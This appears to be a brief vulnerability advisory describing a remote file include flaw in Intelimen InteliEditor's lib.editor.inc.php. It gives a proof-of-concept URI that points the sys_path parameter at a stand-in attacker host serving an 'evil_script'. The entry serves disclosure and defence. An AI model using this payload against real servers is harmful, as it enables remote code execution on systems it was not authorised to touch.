Intelimen InteliEditor Lib.Editor.Inc.PHP Remote File Include Vulnerability

info
discussion
exploit
solution
references

Intelimen InteliEditor Lib.Editor.Inc.PHP Remote File Include Vulnerability

An attacker can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/[script_path]/lib.editor.inc.php?sys_path=http://www.example2.com/evil_script?